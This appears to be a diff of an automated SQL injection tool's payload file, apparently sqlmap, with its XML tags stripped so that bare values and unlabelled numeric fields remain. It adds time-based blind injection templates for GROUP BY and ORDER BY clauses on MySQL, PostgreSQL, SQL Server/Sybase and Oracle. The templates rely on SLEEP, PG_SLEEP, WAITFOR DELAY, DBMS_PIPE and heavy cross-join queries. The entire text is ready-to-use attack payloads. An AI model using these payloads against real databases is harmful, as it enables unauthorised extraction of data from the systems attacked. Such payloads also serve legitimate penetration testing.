MySQL >= 5.0.11 time-based blind - GROUP BY and ORDER BY clauses53
- 2
+ 12,31,(SELECT (CASE WHEN ([INFERENCE]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
@@ -2849,7 +2849,7 @@ Formats:
,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
-
+
MySQL
@@ -2858,7 +2858,7 @@ Formats:
- MySQL < 5.0.12 boolean-based blind - GROUP BY and ORDER BY clauses (heavy query)
+ MySQL < 5.0.12 time-based blind - GROUP BY and ORDER BY clauses (heavy query)542
@@ -2875,7 +2875,126 @@ Formats:
MySQL
-
+
+
+ PostgreSQL > 8.1 time-based blind - GROUP BY and ORDER BY clauses
+ 5
+ 3
+ 1
+ 2,3
+ 1
+ ,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE 1/(SELECT 0) END))
+
+ ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE 1/(SELECT 0) END))
+
+
+
+
+
+ PostgreSQL
+ > 8.1
+
+
+
+
+ PostgreSQL time-based blind - GROUP BY and ORDER BY clauses (heavy query)
+ 5
+ 4
+ 2
+ 2,3
+ 1
+ ,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE 1/(SELECT 0) END))
+
+ ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE 1/(SELECT 0) END))
+
+
+
+
+
+ PostgreSQL
+
+
+
+
+ Microsoft SQL Server/Sybase time-based blind - ORDER BY clauses
+ 5
+ 3
+ 1
+ 2,3
+ 1
+ ,(SELECT (CASE WHEN ([INFERENCE]) THEN WAITFOR DELAY '0:0:[SLEEPTIME]' ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))
+
+ ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN WAITFOR DELAY '0:0:[SLEEPTIME]' ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))
+
+
+
+
+
+ Microsoft SQL Server
+ Sybase
+ Windows
+
+
+
+
+ Microsoft SQL Server/Sybase time-based blind - ORDER BY clause (heavy query)
+ 5
+ 4
+ 2
+ 2,3
+ 1
+ ,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))
+
+ ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))
+
+
+
+
+
+ Microsoft SQL Server
+ Sybase
+ Windows
+
+
+
+
+ Oracle time-based blind - GROUP BY and ORDER BY clauses
+ 5
+ 3
+ 1
+ 2,3
+ 1
+ ,(SELECT (CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)
+
+ ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)
+
+
+
+
+
+ Oracle
+
+
+
+
+ Oracle time-based blind - GROUP BY and ORDER BY clauses (heavy query)
+ 5
+ 4
+ 2
+ 2,3
+ 1
+ ,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)
+
+ ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)
+
+
+
+
+
+ Oracle
+
+
+